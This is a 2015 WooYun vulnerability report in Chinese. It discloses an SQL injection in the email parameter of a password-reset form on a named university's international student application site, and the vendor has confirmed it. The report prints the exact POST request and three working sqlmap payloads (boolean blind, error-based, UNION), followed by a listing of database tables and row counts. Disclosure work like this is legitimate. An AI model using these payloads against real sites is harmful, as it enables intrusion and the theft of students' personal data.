当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0149769

漏洞标题:浙江工业大学某系统SQL注入漏洞

相关厂商:zjut.edu.cn

漏洞作者: ledoo

提交时间:2015-10-27 11:22

修复时间:2015-12-11 16:56

公开时间:2015-12-11 16:56

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-27: 细节已通知厂商并且等待厂商处理中
2015-10-27: 厂商已经确认,细节仅向厂商公开
2015-11-06: 细节向核心白帽子及相关领域专家公开
2015-11-16: 细节向普通白帽子公开
2015-11-26: 细节向实习白帽子公开
2015-12-11: 细节向公众公开

简要描述:

浙江工业大学某系统SQL注入漏洞

详细说明:

http://www.apply.zjut.edu.cn/en/student/login/fpassword 
(POST)
findpassword=Reset Password&code=Verification Code&email=1'


email参数存在注入

QQ图片20151027110706.png


漏洞证明:

内有大量留学生信息

Place: POST
Parameter: email
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: findpassword=Reset Password&code=Verification Code&email=-5404%' OR (6778=6778)#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: findpassword=Reset Password&code=Verification Code&email=-6171%' OR 1 GROUP BY CONCAT(0x7161716371,(SELECT (CASE WHEN (9966=9966) THEN 1 ELSE 0 END)),0x71766f7771,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: UNION query
Title: MySQL UNION query (random number) - 35 columns
Payload: findpassword=Reset Password&code=Verification Code&email=-5577%' UNION ALL SELECT 3639,3639,3639,3639,3639,3639,3639,CONCAT(0x7161716371,0x4b64794b4b486c596d43,0x71766f7771),3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639#
---
web application technology: Apache 2.4.12, PHP 5.5.24
back-end DBMS: MySQL 5
Database: apply
+------------------------------------------+---------+
| Table | Entries |
+------------------------------------------+---------+
| cucas_formitem | 30517 |
| cucas_apply_template_info | 22935 |
| cucas_formtopic | 14093 |
| cucas_attachmentstopic | 6515 |
| cucas_apply_history | 5081 |
| cucas_templateclass | 4090 |
| cucas_apply_attachment_info | 1628 |
| cucas_admin_logs | 969 |
| cucas_system_group_menu | 927 |
| cucas_student_info | 660 |
| cucas_apply_info | 439 |
| cucas_app_log | 373 |
| cucas_major | 248 |
| cucas_apply_order_info | 174 |
| cucas_budget | 174 |
| cucas_deposit_info | 169 |
| cucas_app_getoffer | 161 |
| cucas_print_fields | 159 |
| cucas_message | 128 |
| cucas_message_record | 84 |
| cucas_user_message | 84 |
| cucas_school_accommodation_prices | 82 |
| cucas_credentials | 69 |
| cucas_mail_record | 54 |
| cucas_applyscholarship_info | 52 |
| cucas_admin_info | 26 |
| cucas_category_info | 26 |
| cucas_message_log | 24 |
| cucas_mail_dot | 23 |
| cucas_pages_info | 20 |
| cucas_print_template | 19 |
| cucas_faculty | 18 |
| cucas_buliding_floor_room | 17 |
| cucas_user_room | 16 |
| cucas_theme_file | 15 |
| cucas_major_course | 11 |
| cucas_system_group | 11 |
| cucas_agency_info | 9 |
| cucas_quarterage_info | 8 |
| cucas_module_info | 7 |
| cucas_room_electric_user | 7 |
| cucas_ppt_info | 6 |
| cucas_insurance_info | 5 |
| cucas_room_electric_record | 5 |
| cucas_school_accommodation_campus_info | 5 |
| cucas_attachments | 4 |
| cucas_degree_info | 4 |
| cucas_scholarship_info | 4 |
| cucas_school_accommodation_buliding | 4 |
| cucas_theme_info | 4 |
| cucas_commission_record | 3 |
| cucas_school_accommodation_buliding_info | 3 |
| cucas_image_info | 2 |
| cucas_landlord_info | 2 |
| cucas_major_content | 2 |
| cucas_major_images | 2 |
| cucas_major_pl | 2 |
| cucas_notice_info | 2 |
| cucas_out_room | 2 |
| cucas_school_accommodation_campus | 2 |
| cucas_school_accommodation_prices_info | 2 |
| cucas_test_paper | 2 |
| cucas_paypal | 1 |
| cucas_pickup_info | 1 |
| cucas_question_info | 1 |
+------------------------------------------+---------+

修复方案:

参数检查过滤

版权声明:转载请注明来源 ledoo@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-10-27 16:54

厂商回复:

谢谢你的帮助,我们会尽快处理的

最新状态:

暂无